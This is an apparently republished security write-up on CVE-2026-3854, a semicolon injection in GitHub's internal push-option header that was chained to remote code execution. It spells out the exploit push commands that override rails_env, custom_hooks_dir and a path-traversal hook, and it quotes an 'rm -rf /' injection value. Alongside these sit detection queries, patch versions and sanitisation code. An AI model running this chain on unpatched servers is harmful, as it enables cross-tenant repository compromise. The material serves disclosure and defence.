CVE-2026-3854: From Zero to GitHub RCE: How a Single Semicolon Hijacked Millions of Repositories + Video

Introduction

GitHub’s internal git infrastructure, which processes every push, relies on a chain of services (babeld, gitauth, gitrpcd and a pre‑receive hook) that exchange security‑critical metadata via a semicolon‑delimited header named X‑Stat. Wiz Research discovered that user‑supplied `git push` option values were placed verbatim into this header without sanitizing the semicolon delimiter, enabling an attacker to inject arbitrary fields and ultimately execute code on GitHub’s backend servers.

Learning Objectives

  • Understand how unchecked user input in an internal protocol can be chained into remote code execution.
  • Learn the exploitation path: sandbox bypass → hook directory redirection → path traversal to arbitrary command execution.
  • Acquire hands‑on commands to audit similar injection vulnerabilities, verify patch status, and harden CI/CD pipelines.

You Should Know

1. Anatomy of the X-Stat Header Injection

The vulnerability stemmed from the way babeld, GitHub’s git proxy, built the internal X‑Stat header. Push options supplied with `git push -o` were copied as numbered fields (push_option_0, push_option_1, …) without sanitizing the `;` character, which is the header’s field delimiter. Because the header parser uses last‑write‑wins semantics, an attacker who injects a semicolon followed by a security‑critical field name (e.g., rails_env=development) overrides the legitimate value that appears earlier in the header.

Step‑by‑step injection example:

# Normal push with two options
git push -o "key1=value1" -o "key2=value2" origin main

# Malicious push injecting a semicolon and a security field
git push -o "ignoreme;rails_env=development;custom_hooks_dir=/tmp/malicious" origin main

The resulting X‑Stat header fragment becomes:

push_option_0=ignoreme;rails_env=development;custom_hooks_dir=/tmp/malicious;push_option_1=...

This simple trick allowed the attacker to plant environment and configuration directives into a header that downstream services – gitrpcd and the pre‑receive hook – trusted unconditionally.
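As an added illustration (not GitHub’s code), the following Python models a semicolon‑delimited header built from push options and parsed with last‑write‑wins semantics, then shows a builder that rejects delimiters and a parser that refuses duplicate keys; the base field values are assumed.

```python
# Added model of the X-Stat-style header flaw; field values are hypothetical.

def build_header_vulnerable(base_fields, push_options):
    """Flawed behaviour: push options are copied into the header verbatim."""
    parts = [f"{k}={v}" for k, v in base_fields.items()]
    parts += [f"push_option_{i}={opt}" for i, opt in enumerate(push_options)]
    return ";".join(parts)

def parse_header(header):
    """Last-write-wins: a later duplicate key silently replaces an earlier one."""
    fields = {}
    for part in filter(None, header.split(";")):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields

def build_header_hardened(base_fields, push_options):
    """Rejects any option that could smuggle a delimiter. Rejecting beats
    stripping: the client gets an error instead of a silently altered option."""
    for opt in push_options:
        if any(ch in opt for ch in ";\r\n"):
            raise ValueError(f"push option contains header delimiter: {opt!r}")
    return build_header_vulnerable(base_fields, push_options)

def parse_header_strict(header):
    """Defensive parser: a duplicate key is an error, never an override."""
    fields = {}
    for part in filter(None, header.split(";")):
        key, _, value = part.partition("=")
        if key in fields:
            raise ValueError(f"duplicate header field: {key}")
        fields[key] = value
    return fields

def overridden_fields(base_fields, push_options):
    """Base fields that a set of push options would change under the flawed path."""
    parsed = parse_header(build_header_vulnerable(base_fields, push_options))
    return {k: parsed[k] for k in base_fields if parsed[k] != base_fields[k]}

# Constructed inputs (hypothetical base values, not GitHub's real configuration)
BASE = {"rails_env": "production", "custom_hooks_dir": "/data/hooks"}
INJECTED = ["ignoreme;rails_env=development", "key2=value2"]

if __name__ == "__main__":
    print(build_header_vulnerable(BASE, INJECTED))
    print(overridden_fields(BASE, INJECTED))   # {'rails_env': 'development'}
```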

Linux / macOS command to monitor local git traffic (for lab testing):

# Capture git push traffic on a test instance (requires a local git daemon)
GIT_TRACE=1 GIT_CURL_VERBOSE=1 git push -o "test;injected" origin main 2>&1 | tee capture.log

2. Chaining the Exploit: From Injection to RCE

The exploit chains three injected fields to achieve unsandboxed code execution as the `git` user on both GitHub Enterprise Server (GHES) and GitHub.com.

  1. Sandbox bypass – Override `rails_env` to a non‑production value. The pre‑receive hook binary contains two code paths: a sandboxed one for production and an unsandboxed, direct‑execution path for any other environment. Injecting `rails_env=development` forces the unsandboxed path.

  2. Redirect the hook directory – Override `custom_hooks_dir` to point to an attacker‑controlled directory (e.g., /tmp/malicious). The binary will look for hook scripts there.

  3. Path traversal to arbitrary binary – Override `repo_pre_receive_hooks` with a crafted hook entry that contains a path traversal sequence (e.g., ../../../usr/bin/id). The binary resolves the path, joins it with the attacker‑controlled base directory, and executes the resolved binary without any arguments or sandbox restrictions.

Full exploitation command (simplified PoC structure):

git push -o "dummy;rails_env=development" \
-o "dummy;custom_hooks_dir=/tmp/malicious" \
-o "dummy;repo_pre_receive_hooks={\"hooks\":[{\"script\":\"../../../usr/bin/id\"}]}" \
origin main

On GHES this yields immediate command output (e.g., uid=991(git) …). On GitHub.com the same chain works after also injecting `enterprise_mode=true` to activate the custom hooks path that is normally disabled.

3. AI‑Augmented Reverse Engineering with IDA MCP

Wiz researchers were able to find this vulnerability because they leveraged AI‑augmented tooling – specifically IDA MCP – to reverse engineer GitHub’s compiled black‑box binaries at scale. Traditional manual reverse engineering of the entire git pipeline would have been prohibitively time‑consuming. By using an LLM‑powered assistant that bridges IDA Pro with language models, they rapidly reconstructed internal protocols and identified where user input could influence server behaviour.

For security teams who want to adopt similar techniques:

# Install IDA MCP (requires IDA Pro 9.0+ and Python)
pip uninstall ida-pro-mcp
pip install git+https://github.com/mrexodia/ida-pro-mcp

# Run the MCP server inside IDA (File -> Script File -> ida_mcp_server.py)
# Then use a compatible LLM client to query the binary's decompiled code.

This approach is not limited to GitHub – any organization that relies on closed‑source binaries in their supply chain can use AI‑assisted reverse engineering to uncover hidden injection points, insecure protocol parsers, or hardcoded secrets.

Windows CLI alternative (using WinDbg for dynamic analysis):

# Attach to a process and monitor API calls (example for git.exe)
windbg -pn git.exe
# Set a breakpoint on CreateProcess to detect unsanitised arguments
bp kernel32!CreateProcessW
g

4. Impact Assessment: Cross‑Tenant Exposure and Full Server Compromise

– On GitHub.com: Code execution lands on a shared storage node running as the `git` user. By design, this user has broad filesystem access to all repositories hosted on that node. Wiz researchers enumerated repository index entries and found millions of entries belonging to other users and organisations. Although the researchers did not read third‑party content, they confirmed that the filesystem permissions would allow such access.
– On GHES: The same exploit grants full server compromise – read/write access to every repository, internal service configuration, and the ability to pivot to other nodes within the enterprise network.

Telemetry query to detect potential exploitation (using GitHub’s audit log):

# On GHES, review audit logs for anomalous push options (a ';' inside an option value)
sudo grep -E "push_option.*;" /var/log/github-audit.log | grep -E "rails_env|custom_hooks_dir|repo_pre_receive_hooks"
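An added detection example, not a GitHub or Wiz tool: it scans audit‑style log lines for push options that embed the `;` delimiter and escalates when the smuggled segment names one of the security‑critical fields above. The JSON‑per‑line record layout and its field names are assumed, and the sample lines are constructed.

```python
import json
import re

# Added example: flags push options that carry the X-Stat delimiter.
# Record layout (JSON per line with "push_options") is an assumption;
# adapt the loader to the real audit log format.

SENSITIVE_KEYS = {"rails_env", "custom_hooks_dir",
                  "repo_pre_receive_hooks", "enterprise_mode"}
SMUGGLED_FIELD = re.compile(r";\s*([A-Za-z_][A-Za-z0-9_]*)=")

def classify_option(opt):
    """Return None, 'delimiter' or 'override' for one push option value."""
    if ";" not in opt:
        return None
    keys = set(SMUGGLED_FIELD.findall(opt))
    return "override" if keys & SENSITIVE_KEYS else "delimiter"

def scan_audit_lines(lines):
    """Walk log lines and collect findings with actor, repo and severity."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        try:
            rec = json.loads(line)
        except ValueError:
            continue  # not a JSON record; skip it
        for opt in rec.get("push_options", []):
            verdict = classify_option(opt)
            if verdict:
                findings.append({"line": lineno, "actor": rec.get("actor"),
                                 "repo": rec.get("repo"),
                                 "severity": verdict, "option": opt})
    return findings

# Constructed sample log (not real GHES output)
SAMPLE_LOG = """\
{"action":"git.push","actor":"alice","repo":"acme/app","push_options":["ci.skip"]}
{"action":"git.push","actor":"bob","repo":"acme/app","push_options":["note=a;b"]}
{"action":"git.push","actor":"eve","repo":"acme/app","push_options":["x;rails_env=development","x;custom_hooks_dir=/tmp/m"]}
garbage line
"""

if __name__ == "__main__":
    for finding in scan_audit_lines(SAMPLE_LOG.splitlines()):
        print(finding)
```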

5. Mitigation and Patch Status

  • GitHub.com: Fixed on March 4, 2026 within six hours of the report. No user action is required.
  • GitHub Enterprise Server: Patched versions are available. 88% of instances remained vulnerable at the time of public disclosure (April 28, 2026). Administrators must upgrade immediately.

Patched versions:

  • 3.14.25 (or later)
  • 3.15.20 (or later)
  • 3.16.16 (or later)
  • 3.17.13 (or later)
  • 3.18.8 (or later)
  • 3.19.4 (or later)
  • 3.20.0 (or later)

Step‑by‑step upgrade command on GHES:

# SSH into your GHES instance as admin
ssh admin@your-ghes-instance

# Check current version
ghe-version

# Upgrade to the latest patch release (example for 3.19.x)
sudo ghe-update --version 3.19.4

# Verify the upgrade
ghe-version

Wiz customers can use the pre‑built query in the Wiz Threat Center to identify vulnerable GHES instances in their environment.

6. Defensive Measures: Hardening CI/CD and Internal Protocols

Beyond patching, this vulnerability highlights a systemic issue that affects any multi‑service architecture where user input flows through a shared internal protocol. Security teams should audit such designs for similar injection flaws.

Linux command to scan git push option usage in CI/CD scripts:

# Search for git push -o usages that might embed arbitrary variables
grep -r "git push.*-o" .github/workflows/ .gitlab-ci.yml Jenkinsfile

Defensive code patterns (Python):

def sanitize_push_option(value: str) -> str:
    # Remove any characters that could act as delimiters in internal headers.
    # Rejecting such values outright is stricter than stripping them.
    return value.replace(";", "").replace("\n", "").replace("\r", "")

# In the internal header builder
def build_push_option_fields(user_options) -> str:
    header = ""
    for i, user_option in enumerate(user_options):
        safe_option = sanitize_push_option(user_option)
        header += "push_option_" + str(i) + "=" + safe_option + ";"
    return header

Windows PowerShell command to monitor for suspicious git processes (event 4688 only carries the command line when process creation auditing with command‑line logging is enabled):

Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | Where-Object { $_.Message -match "git push -o" } | Format-List

Cloud hardening tip (Azure DevOps / AWS CodeCommit):

  • Place a web application firewall (WAF) or API gateway in front of your git endpoints. Configure rules to block push option values that contain semicolons, backticks, `$(` , or other shell‑metacharacters.

7. Broader Implications for Git‑Based Supply Chains

CVE-2026-3854 is not an isolated incident. Similar command injection vulnerabilities have been found in:
– Tekton Pipelines – where unsanitised revision parameters allowed `git fetch --upload-pack` injection.
– GitPython – unsafe handling of keyword arguments that bypassed the library’s security filters.
– Ungit – argument injection via the `/api/fetch` endpoint.

Auditing your own code for argument injection (Python example):

import subprocess

# UNSAFE: user input directly concatenated into a command string
branch = user_input  # may contain "; rm -rf /"
subprocess.run(f"git push origin {branch}", shell=True)

# SAFE: pass an argument list and never use shell=True; "--" ends option
# parsing so a value starting with "-" (e.g. "--upload-pack=...") cannot
# be read as a git option
subprocess.run(["git", "push", "origin", "--", branch], shell=False)

Windows equivalent (C#):

using System.Diagnostics;

// UNSAFE: the whole command line is handed to cmd.exe
Process.Start("cmd.exe", "/c git push origin " + userInput);

// SAFE: no shell, and each argument is passed separately so userInput cannot
// split into extra arguments; "--" stops git from treating it as an option
var psi = new ProcessStartInfo("git") { UseShellExecute = false };
psi.ArgumentList.Add("push");
psi.ArgumentList.Add("origin");
psi.ArgumentList.Add("--");
psi.ArgumentList.Add(userInput);
Process.Start(psi);

What Undercode Say

  • Assumptions across trust boundaries are the new injection vectors. Each service trusted the X‑Stat header completely, and each team’s reasonable assumption became a lethal chain when combined.
  • AI‑augmented reverse engineering is a game changer for zero‑day research. Traditional black‑box audits of complex systems like GitHub’s git pipeline would have taken months; IDA MCP reduced that to days. Defenders must assume attackers will use the same tools.

Prediction

Over the next 12 months, we will see a sharp rise in vulnerabilities discovered through AI‑assisted reverse engineering of closed‑source components, especially in cloud provider internal APIs and CI/CD systems. Organisations will need to shift from perimeter‑based defenses to protocol‑level input validation across every service boundary. The era of “trusted internal headers” is ending – every field that user input can touch must be treated as attacker‑controlled, regardless of how deep it sits inside the stack.

Reported By: Https: – Hackers Feeds